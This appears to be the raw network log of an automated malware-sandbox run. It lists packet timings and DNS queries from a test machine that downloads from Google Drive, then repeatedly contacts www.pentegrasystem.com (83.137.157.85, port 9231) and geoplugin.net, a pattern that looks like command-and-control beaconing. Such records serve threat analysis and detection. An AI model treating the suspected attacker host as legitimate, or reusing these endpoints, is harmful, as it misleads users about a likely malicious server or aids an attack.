                                                                                                                  Apr 26, 2024 21:56:21.872730017 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:21.872737885 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.875160933 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.875262022 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:21.875268936 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.875766039 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.875832081 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:21.875838995 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.878740072 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.878817081 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:21.878823996 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.879684925 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.879750013 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:21.879757881 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.881938934 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.882004976 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:21.882011890 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.882797956 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.882877111 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:21.882884979 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.885564089 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.885792017 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:21.885799885 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.886523008 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.887104988 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:21.887124062 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.889439106 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.889964104 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.890055895 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.890094042 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:21.890105963 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.890129089 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:21.891140938 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.891541958 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:21.891550064 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.892271996 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.895436049 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:21.895448923 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:21.947350979 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.082199097 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.082581043 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.082669020 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.082741976 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.082756042 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.082864046 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.082900047 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.082909107 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.083008051 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.083014965 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.083165884 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.083287954 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.083390951 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.083432913 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.083441973 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.083507061 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.083535910 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.083543062 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.083580017 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.083609104 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.083616972 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.083690882 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.083698034 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.083767891 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.096915960 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.097136021 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.097218037 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.097244978 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.097253084 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.097377062 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.097532034 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.097901106 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.097908974 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.100476027 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.100567102 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.100605011 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.100613117 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.100728989 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.100814104 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.100842953 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.100851059 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.100869894 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.100991964 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.101553917 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.101562023 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.103257895 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.103346109 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.103431940 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.103454113 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.103462934 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.103490114 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.104856014 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.104948997 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.105038881 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.105079889 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.105089903 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.105108976 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.105186939 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.106801987 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.106884956 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.106916904 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.106928110 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.107016087 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.107033014 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.107127905 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.107167006 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.107173920 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.107279062 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.107317924 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.107326031 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.107460976 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.126117945 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.126207113 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.126240969 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.126249075 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.126270056 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.126362085 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.126451015 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.126483917 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.126492023 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.126604080 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.126694918 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.126728058 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.126735926 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.126784086 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.126791000 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.126919031 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.126948118 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.126956940 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127079964 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127136946 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.127145052 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127188921 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127218008 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.127226114 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127264023 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127285957 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.127294064 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127343893 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127377033 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.127384901 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127397060 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127489090 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.127491951 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127540112 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127567053 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.127574921 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127687931 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127722979 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.127733946 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127743959 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127753973 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.127768040 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127793074 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127799034 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.127806902 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127829075 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.127836943 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127857924 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.127892017 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127924919 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.127932072 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.127963066 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.127990007 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.128021002 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.128083944 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.129110098 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.129127026 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.129173040 CEST49729443192.168.2.5142.250.217.193
                                                                                                                  Apr 26, 2024 21:56:22.129182100 CEST44349729142.250.217.193192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:24.329866886 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:24.589880943 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:24.593202114 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:24.593601942 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:24.909557104 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:25.542325974 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:25.592264891 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:25.850408077 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:25.881347895 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:26.033250093 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:56:26.190912962 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:26.274913073 CEST8049731178.237.33.50192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:26.275039911 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:56:26.320499897 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:56:26.571598053 CEST8049731178.237.33.50192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:26.571655989 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:56:26.589782000 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:26.927627087 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:27.570162058 CEST8049731178.237.33.50192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:27.571044922 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:56:37.253396034 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:37.299295902 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:39.769570112 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:40.079786062 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:56.259893894 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:56.259938955 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:56.260010004 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:56.260462999 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:56.260473967 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:56.964721918 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:56.964840889 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:56.966835022 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:56.966846943 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:56.967871904 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:56.976541042 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.020159960 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.655999899 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.656052113 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.656126022 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.656145096 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.656200886 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.656267881 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.656323910 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.656330109 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.656384945 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.656390905 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.656481028 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.656523943 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.660087109 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.660105944 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.660126925 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.660132885 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:03.970956087 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:03.970993042 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:03.971071959 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:03.971381903 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:03.971400023 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:04.915572882 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:04.915858030 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:04.915874004 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:04.916174889 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:04.916451931 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:04.916507959 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:04.960365057 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:07.256998062 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:07.258358002 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:57:07.579963923 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:14.346206903 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:14.346256971 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:14.346328020 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:14.545383930 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:14.545423985 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:37.767338991 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:37.770062923 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:57:38.081480026 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:40.997860909 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:57:41.701189041 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:57:42.975378036 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:57:45.385389090 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:57:50.286396027 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:57:59.886413097 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:58:07.290245056 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:58:07.292342901 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:58:07.611794949 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:58:19.179440022 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:58:37.300503969 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:58:37.304838896 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:58:37.611438990 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:59:07.319762945 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:59:07.321063042 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:59:07.667068958 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:59:37.319714069 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:59:37.322575092 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:59:37.649950027 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 22:00:07.320245981 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 22:00:07.371572971 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 22:00:07.892141104 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 22:00:08.205214024 CEST92314973083.137.157.85192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                  Apr 26, 2024 21:57:00.248338938 CEST5015353192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:57:00.376305103 CEST53501531.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:08.200331926 CEST53607901.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:27.855957031 CEST53515031.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:43.500474930 CEST6545153192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:57:43.627187014 CEST53654511.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:58:14.269280910 CEST53625761.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:58:30.363583088 CEST5997253192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:58:30.491169930 CEST53599721.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:58:54.495666981 CEST6426853192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:58:54.622006893 CEST53642681.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:59:30.412638903 CEST53640061.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:59:42.047749043 CEST138138192.168.2.5192.168.2.255
                                                                                                                  Apr 26, 2024 21:59:45.373955965 CEST6497453192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:59:45.500214100 CEST53649741.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 26, 2024 21:55:59.852026939 CEST | 192.168.2.5 | 1.1.1.1 | 0xf2a5 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:55:59.852790117 CEST | 192.168.2.5 | 1.1.1.1 | 0x7004 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Apr 26, 2024 21:56:16.844623089 CEST | 192.168.2.5 | 1.1.1.1 | 0x9c67 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:56:17.892868996 CEST | 192.168.2.5 | 1.1.1.1 | 0x3dd3 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:56:24.023170948 CEST | 192.168.2.5 | 1.1.1.1 | 0xf5be | Standard query (0) | www.pentegrasystem.com | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:56:25.905813932 CEST | 192.168.2.5 | 1.1.1.1 | 0x9a5b | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:57:00.248338938 CEST | 192.168.2.5 | 1.1.1.1 | 0xf171 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:57:43.500474930 CEST | 192.168.2.5 | 1.1.1.1 | 0x7e81 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:58:30.363583088 CEST | 192.168.2.5 | 1.1.1.1 | 0x118f | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:58:54.495666981 CEST | 192.168.2.5 | 1.1.1.1 | 0x3617 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:59:45.373955965 CEST | 192.168.2.5 | 1.1.1.1 | 0x2d52 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 26, 2024 21:55:59.977833986 CEST | 1.1.1.1 | 192.168.2.5 | 0xf2a5 | No error (0) | www.google.com | | 142.250.64.196 | A (IP address) | IN (0x0001) | false
